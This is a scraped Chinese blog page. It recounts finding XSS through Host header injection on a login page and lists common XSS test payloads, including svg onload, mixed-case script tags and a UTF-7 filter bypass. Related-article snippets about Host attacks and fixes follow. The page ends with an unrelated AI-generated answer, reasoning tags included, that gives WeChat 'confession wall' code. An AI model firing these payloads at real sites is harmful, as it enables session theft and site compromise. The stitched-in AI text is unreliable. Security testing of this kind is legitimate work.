第一次在Host头处发现了XSS

最新推荐文章于 2024-05-27 23:13:14 发布
最新推荐文章于 2024-05-27 23:13:14 发布
阅读量1.8k 收藏 8
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 渗透测试总结的方法 文章标签: 渗透测试 host头处xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Bul1et/article/details/86141069
本文详细记录了一次XSS攻击的实际操作过程,包括利用主机头注入漏洞,与XSS过滤器的对抗策略,以及多种payload的构造与执行方法。文中还分享了常用的XSS验证payload,涵盖按键触发、SVG标签利用等场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

某天在挖洞时,噼里啪啦一顿信息收集之后发现了个登陆界面如下:

抓请求包

试着把整个host头的值替换成www.baidu.com

host头的值确实会完全展示在页面中,接下来就是与XSS过滤器的一番殊死搏斗了,payload很简单就被执行了。。。。。。直接在之前的参数后面添加payload: ’;prompt`1`;’(此处省去简单的XSS绕过过程),重放数据包:

刷新前台页面

最后附上常用的验证xss的payload

accesskey="X" onclick=location="aler"+"t`1`"(按键触发,针对于input标签的hidden属性)<svg/onload=confirm(doucument.domain)>(很多情况,都会忽略svg表签)"><sCrI%20pT%20>PrOmPt('1')</ScrI%20pt>"><sCrI%20pT%20>PrOmPt`1`</ScrI%20pt><script>alert(String.fromCharCode(88,83,83))</script>绕过<>:u003cimg src=1 onerror=alert(/xss/)u003e使用 utf-7 编码可以绕过,比如<script>alert("XSS")</script>使用  UTF-7编码:+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-然后所有的加号需要被改成%2b,否则会被浏览器识别为连接符%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-最后可以将XSS PAYLOAD进行html编码后再进行URL编码,有时候也会有不错的收获。

HTTP请求Host注入
墨痕诉清风的博客
02-14 591
通过正向代理,大大提高了后续用户的访问速度,使他们无需再穿越Internet,只要从本地Web缓存就可以获取所需要的信息,避免了带宽问题,同时可以大量减少重复请求在网络上的传输,从而降低网络流量,节省资费。当用户收到密码重置邮件后,发现是钓鱼者的网址,且秘钥令牌也已参数id的形式传给给攻击者,此时攻击者可以直接使用受害者的令牌进行密码重置。上述代码的意思是,如果请求的host不是这两个地址发来的,最终会返回403错误信息,而不会请求到更改后的服务器IP。上述代码加入的位置:如下图中的server中。
15、如何在 Electron JavaScript 应用程序中查找并利用 XSS 以实现 RCE
silver的专栏
08-01 9
本文详细介绍了如何在 Electron JavaScript 应用程序中查找并利用 XSS 漏洞以实现远程代码执行(RCE)。内容涵盖动态分析与调试、存储型 XSS 的识别与触发、代码分析、漏洞动态确认、XSS 武器化实现 RCE 以及发现的其他 XSS 漏洞点和相关安全漏洞。通过实际案例和操作步骤,帮助安全研究人员理解 Electron 应用程序中潜在的安全风险及应对方法。
使用java代码方式解决XSSHost Head漏洞问题
gmj53的专栏
08-04 1559
一、使用java代码方式解决XSS漏洞问题 1 ESAPI方式 1.1 引入jar包 compile('org.owasp.esapi:esapi:2.2.3.1') { exclude group: 'log4j', module: 'log4j' exclude group: 'org.slf4j', module: 'slf4j-simple' } 1.2 增加配置文件 1.2.1 ESAPI.properties配置文件内容 # 是否要打印配置属性,默认为true ESAPI.p
XSS利用之一看就懂
qq_42743187的博客
01-31 515
xss利用方法之前,先分享一个前几天友情测试的案例吧 一、XSS案例 站点就不说了,图片打码,主要看效果就可以了???? 页面上有个搜索框,输入随机值在标签中输出,不允许输入尖括号,页面会直接显示错误,但双引号可以使用 " οnclick="alert(1),直接测试,查看页面源代码发现一个问题: 就是我输入的英文小括号,输出时变成了中文括号,这样alert()函数就执行不了了。。。 于是想到,用反引号来代替小括号试试,成功弹窗,源代码显示如下: 但是这里又存在一个问题,反引号里的内容会被当成字符串
一个简单的XSS检测工具
weixin_44611282的博客
06-10 1271
检测的主要流程: 发送随机flag -> 确定参数回显 -> 确定回显位置以及情况(html,js语法解析) -> 根据情况根据不同payload探测 -> 使用html,js语法解析确定是否多出来了标签,属性,js语句等等。 在拿到一个域名后开始深度检索存在的所有链接(href,src),在经过数据清洗后得到有用的页面(去除js等其他目录) def SearchDir(TestUrl): header = { 'User-Agent':
Host攻击
wfdfg的博客
05-27 5842
(也被称为HTTP Host注入攻击)是一种Web安全漏洞,攻击者通过篡改HTTP请求中的Host部字段来执行恶意操作。在HTTP协议中,Host部字段用于指定请求所针对的域名,以便服务器能够正确地将请求路由到相应的Web应用程序。
网站安全个人总结
weixin_33756418的博客
05-12 233
常见攻击方式:XSS、SQL注入、木马、零日攻击、僵尸网络、资源枚举、参数操作、跨站请求伪造、钓鱼欺骗、Dos攻击拒绝服务等。 常用防止方式:黑名单过滤(有时候我们在对网站过来的请求进行黑名单理 把那些暴漏出来的攻击方法写在黑名单中 当请求过来的时候第一时间去 用黑名单进行过虑 但是 这样的话就要时刻关注有那些漏洞 要及时的去添加到黑名单中 更新 这样就出现了一种被动的防御体系 要我们时时去关...
BurpSuite手册-004-运行你的第一次扫描
06-24
在进行第一次扫描时,Burp Suite用户手册建议用户逐步执行以下步骤: 1. 打开扫描器:在Dashboard选项卡中选择New scan,打开扫描器对话框,这里可以调整扫描的各种设置。 2. 输入目标站点的URL:在相应的字段中输入...
个人笔记-渗透测试-XSS漏洞
weixin_48162696的博客
05-22 712
XSS,反射型,存储型,XSS的检测和利用,XSS的防御方法
WEB漏洞篇——跨站脚本攻击XSS
m0_56634355的博客
06-05 4952
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
web漏洞理之host攻击
zjw00000的博客
10-14 3522
一、host攻击介绍 1、介绍(这段介绍是从网上copy的,关于它的理是我自己总结,整理的) 这个Host是在客户端的请求中的,是由客户端提供的,也就是说客户端可以修改这个值。那么,只要是能被客户端修改的值,都是不可信任的。 当Host部被修改为无效Host会发生什么情况?大多数web服务器配置为将无法识别的Host传送给列表中的第一台虚拟主机或者返回错误信息。因此,这使得把携带有任...
跨站脚本攻击XSS(最全最细致的靶场实战)
热门推荐
m0_51468027的博客
01-31 5万+
一、XSS跨站漏洞 (1)XSS简介   网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting,安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS)有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。恶意攻击者会在 Web页面里插入恶意Script代码,当用户浏览该页之时,嵌.
XSS漏洞检测手段
Kevin's Blog
05-05 9655
文章目录一、手工注入检测1.1 Cheat Sheet二、自动化工具检测2.1 BurpSuite之XSS Validator2.1.1 运行原理2.1.2 插件安装2.1.3 phantomjs安装2.1.4 下载xss.js2.1.5 配置XSS Validator2.1.6 配置Intruder模块2.1.7 XSS漏洞检测2.1.8 工具优缺点2.2 神器之XSSer2.2.1 工具介绍 ...
DOM型的xss漏洞利用
qq_43814486的博客
04-22 1万+
DOM:通过JavaScript,可以重构整个HTML文档,就是说可以添加,移除等等,对页面的某个东西进行操作时,JavaScript就需要获得对HTML文档中所有元素进行访问的入口。这个入口就是DOM,所以在DOM型的xss漏洞利用中,DOM可以看成是一个访问HTML的标准程序接口。 特征:整个过程都是在前端完成的,没有后端的参与(纯前端的操作!) 原理: 上图var str = docume...
让你成为网络世界中有破坏力的人-HTTP报文HOST攻击
Eason_LYC安全白帽子的成长博客
05-19 2890
文中有彩蛋哦。随我的文章细细读来,让你成为一个在网络世界中有破坏力的人! tips:请遵守国家相关法律法规。在专用靶场或取得合法授权情况下进行安全渗透测试
外部系统无法访问OA,配置白名单(前提:有安全补丁包)
余大冠子的博客
09-18 2625
需要将OA系统的访问方式加入到白名单中,具体可以添加到附件《weaver_security_custom_rules_host_20180521.xml》 注:如果有多种访问方式,如端口不同、域名不同、IP和域名都属于不同的访问方式,需要一并加入。 <?xml version="1.0" encoding="UTF-8"?> <root> <ref-list> <ref>http://120.32.30.254</ref> &l
HOST 攻击漏洞
weixin_30387423的博客
06-27 801
日期:2018-03-06 14:32:51 作者:Bay0net 0x01、 前言   在一般情况下,几个网站可能会放在同一个服务器上,或者几个 web 系统共享一个服务器,host 来指定应该由哪个网站或者 web 系统来理用户的请求。 0x02、密码重置漏洞 #!php $user -> hash = random::hash() ; $message -&g...
Nginx: 常见漏洞修复(Host攻击|不安全的Http方法|缺少X-XSS-Protection部)
zJay-L's Blog
03-01 7087
Nginx: 常见漏洞修复(Host攻击|不安全的Http方法|缺少X-XSS-Protection部) Host攻击 在server模块配置: if ($host !~* xxx.xxx.xxx|xxx.ddd.ddd.ddd) { return 403; } 或者 if ($http_Host !~* xxx.xxx.xxx:port|xxx.ddd.ddd.ddd:port) { return 403; } xxx.xxx.xxx:代表域名
帮写一个微信表白代码
最新发布
08-02
<think>我们正在理一个关于微信表白功能实现的问题。用户要求提供代码示例,而我们的引用[1]和引用[2]提供了一些背景信息。但是,请注意,引用内容是关于微信小程序表白功能的,而用户的问题也是关于微信表白功能实现的代码示例。 根据引用[1],表白功能包含几个核心模块:表白墙、我的表白、热门表白、表白指南。引用[2]则提到了微信表白墙源码涉及微信接口集成、后端开发、数据库设计等。 由于用户直接要求“微信表白功能实现代码示例”,我们将提供一个简化版的微信小程序表白墙功能的前后端代码示例。注意,这只是一个基础示例,实际开发中需要根据需求进行扩展。 ### 一、前端(微信小程序)代码示例 #### 1. 表白墙页面(pages/wall/wall) - **wxml文件(wall.wxml)**:展示表白列表 ```xml <view class="container"> <block wx:for="{{confessions}}" wx:key="id"> <view class="confession-item"> <text class="content">{{item.content}}</text> <view class="meta"> <text class="time">{{item.time}}</text> <view class="actions"> <text class="like" bindtap="onLike" data-id="{{item.id}}">❤ {{item.likeCount}}</text> </view> </view> </view> </block> </view> ``` - **js文件(wall.js)**:数据逻辑 ```javascript Page({ data: { confessions: [] // 表白列表 }, onLoad() { // 从服务器获取表白列表 this.getConfessions(); }, getConfessions() { // 模拟数据 const confessions = [ { id: 1, content: '我喜欢你很久了', time: '2023-06-01', likeCount: 10 }, { id: 2, content: '希望你能看到这条消息', time: '2023-06-02', likeCount: 5 } ]; this.setData({ confessions }); }, onLike(e) { // 点赞事件理 const id = e.currentTarget.dataset.id; // 发送请求到后端更新点赞数 // 这里简化理,直接更新前端数据 let confessions = this.data.confessions.map(item => { if (item.id === id) { return { ...item, likeCount: item.likeCount + 1 }; } return item; }); this.setData({ confessions }); } }); ``` #### 2. 发布表白页面(pages/publish/publish) - **wxml文件(publish.wxml)**:发布表单 ```xml <view class="container"> <textarea placeholder="写下你的表白..." bindinput="onInput" value="{{content}}"></textarea> <button type="primary" bindtap="onSubmit">发布</button> </view> ``` - **js文件(publish.js)**:发布逻辑 ```javascript Page({ data: { content: '' }, onInput(e) { this.setData({ content: e.detail.value }); }, onSubmit() { // 提交表白内容到服务器 const content = this.data.content; if (!content) { wx.showToast({ title: '内容不能为空', icon: 'none' }); return; } // 模拟提交 wx.showToast({ title: '发布成功', icon: 'success' }); // 清空内容 this.setData({ content: '' }); // 返回上一页(表白墙) setTimeout(() => { wx.navigateBack(); }, 1500); } }); ``` ### 二、后端(Node.js)代码示例 使用Express框架搭建一个简单的后端服务。 #### 1. 初始化项目 ```bash npm init -y npm install express body-parser ``` #### 2. 创建server.js ```javascript const express = require('express'); const bodyParser = require('body-parser'); const app = express(); // 解析请求体 app.use(bodyParser.json()); // 模拟数据库 let confessions = [ { id: 1, content: '我喜欢你很久了', time: '2023-06-01', likeCount: 10 }, { id: 2, content: '希望你能看到这条消息', time: '2023-06-02', likeCount: 5 } ]; // 获取表白列表 app.get('/api/confessions', (req, res) => { res.json({ code: 0, data: confessions }); }); // 发布表白 app.post('/api/confessions', (req, res) => { const { content } = req.body; if (!content) { return res.status(400).json({ code: 1, message: '内容不能为空' }); } const newConfession = { id: confessions.length + 1, content, time: new Date().toISOString().split('T')[0], likeCount: 0 }; confessions.push(newConfession); res.json({ code: 0, data: newConfession }); }); // 点赞 app.post('/api/confessions/:id/like', (req, res) => { const id = parseInt(req.params.id); const confession = confessions.find(item => item.id === id); if (!confession) { return res.status(404).json({ code: 1, message: '表白不存在' }); } confession.likeCount++; res.json({ code: 0, data: confession }); }); const PORT = 3000; app.listen(PORT, () => { console.log(`Server running at http://localhost:${PORT}`); }); ``` ### 三、数据库设计(示例) 在实际项目中,我们需要使用数据库存储数据。这里给出一个简单的MySQL表设计: ```sql CREATE TABLE `confession` ( `id` int(11) NOT NULL AUTO_INCREMENT, `content` text NOT NULL, `time` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP, `like_count` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; ``` ### 四、注意事项 1. **微信接口集成**:实际开发中需要调用微信登录接口获取用户唯一标识(openid),用于关联用户和表白内容[^2]。 2. **审核机制**:用户发布的内容需要经过审核,避免违规内容出现[^2]。 3. **安全性**:对用户输入进行过滤,防止XSS攻击[^2]。 以上是一个简化版的微信表白墙功能实现。实际开发中,还需要考虑更多细节,如用户身份验证、分页加载、评论功能等。 --- ### §§相关问题§§ 1. 微信小程序如何集成微信登录功能? 2. 如何实现表白内容的审核机制? 3. 微信表白墙如何防止恶意刷赞?</think>### 微信表白功能实现代码示例 以下是一个基于微信小程序的表白墙功能实现代码示例,包含核心功能模块(表白墙展示、发布表白、点赞功能)。代码分为前端(小程序)和后端(Node.js)两部分。 --- #### 一、前端(微信小程序)代码 ##### 1. 表白墙页面(pages/wall/wall) ```javascript // wall.js Page({ data: { confessions: [], // 表白列表 page: 1, loading: false }, onLoad() { this.loadConfessions(); }, // 加载表白列表 loadConfessions() { if (this.data.loading) return; this.setData({ loading: true }); wx.request({ url: 'https://your-api-domain.com/api/confessions', data: { page: this.data.page }, success: (res) => { const newData = res.data.data || []; this.setData({ confessions: [...this.data.confessions, ...newData], page: this.data.page + 1 }); }, complete: () => this.setData({ loading: false }) }); }, // 点赞功能 handleLike(e) { const id = e.currentTarget.dataset.id; wx.request({ url: `https://your-api-domain.com/api/like/${id}`, method: 'POST', success: () => { const updated = this.data.confessions.map(item => item.id === id ? {...item, likes: item.likes + 1} : item ); this.setData({ confessions: updated }); } }); } }) ``` ```xml <!-- wall.wxml --> <scroll-view scroll-y bindscrolltolower="loadConfessions"> <block wx:for="{{confessions}}" wx:key="id"> <view class="confession-card"> <text class="content">{{item.content}}</text> <view class="footer"> <text>{{item.time}}</text> <view class="like" bindtap="handleLike" data-id="{{item.id}}"> ❤ {{item.likes || 0}} </view> </view> </view> </block> <view wx:if="{{loading}}" class="loading">加载中...</view> </scroll-view> ``` ##### 2. 发布表白页面(pages/publish/publish) ```javascript // publish.js Page({ data: { content: '' }, handleInput(e) { this.setData({ content: e.detail.value }); }, submitConfession() { if (!this.data.content.trim()) { wx.showToast({ title: '内容不能为空', icon: 'none' }); return; } wx.request({ url: 'https://your-api-domain.com/api/confessions', method: 'POST', data: { content: this.data.content }, success: () => { wx.navigateBack(); wx.showToast({ title: '发布成功' }); } }); } }) ``` ```xml <!-- publish.wxml --> <view class="form-container"> <textarea placeholder="写下你的表白..." value="{{content}}" bindinput="handleInput" maxlength="200" auto-height ></textarea> <button type="primary" bindtap="submitConfession">发布</button> </view> ``` --- #### 二、后端(Node.js + Express)代码 ##### 1. 基础服务器配置 ```javascript // server.js const express = require('express'); const bodyParser = require('body-parser'); const app = express(); const PORT = 3000; // 中间件 app.use(bodyParser.json()); app.use((req, res, next) => { res.header('Access-Control-Allow-Origin', '*'); next(); }); // 模拟数据库 let confessions = [ { id: 1, content: '第一次见到你就心动了', time: '2023-06-01', likes: 12 }, { id: 2, content: '希望每天都能见到你的笑容', time: '2023-06-02', likes: 8 } ]; // 路由 app.get('/api/confessions', (req, res) => { const page = parseInt(req.query.page) || 1; const pageSize = 10; const start = (page - 1) * pageSize; const result = confessions.slice(start, start + pageSize); res.json({ code: 0, data: result, hasMore: start + pageSize < confessions.length }); }); app.post('/api/confessions', (req, res) => { const newConfession = { id: Date.now(), content: req.body.content, time: new Date().toLocaleDateString(), likes: 0 }; confessions.unshift(newConfession); res.json({ code: 0, data: newConfession }); }); app.post('/api/like/:id', (req, res) => { const id = parseInt(req.params.id); const confession = confessions.find(item => item.id === id); if (confession) confession.likes++; res.json({ code: 0 }); }); app.listen(PORT, () => console.log(`Server running on port ${PORT}`)); ``` ##### 2. 数据库集成(MySQL示例) ```javascript // 添加MySQL支持 const mysql = require('mysql2'); const pool = mysql.createPool({ host: 'localhost', user: 'root', password: 'password', database: 'love_wall', waitForConnections: true, connectionLimit: 10 }); // 修改GET表白接口 app.get('/api/confessions', async (req, res) => { const [rows] = await pool.promise().query( 'SELECT * FROM confessions ORDER BY id DESC LIMIT ? OFFSET ?', [pageSize, start] ); res.json({ code: 0, data: rows }); }); ``` --- #### 三、核心功能说明 1. **表白墙展示**: - 分页加载表白内容 - 显示发布时间和点赞数 - 下拉加载更多 2. **发布功能**: - 内容输入校验 - 提交到后端保存 - 成功反馈 3. **点赞功能**: - 点击爱心图标发送请求 - 实时更新点赞数 - 防止重复点击(需添加前端限制) 4. **安全机制**: - 内容审核(需集成第三方审核API) - 频率限制(防止刷赞) - 敏感词过滤 > 实际部署需补充的功能:用户登录(微信openid绑定)、内容审核、数据库持久化、防止XSS攻击[^2] --- ###
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值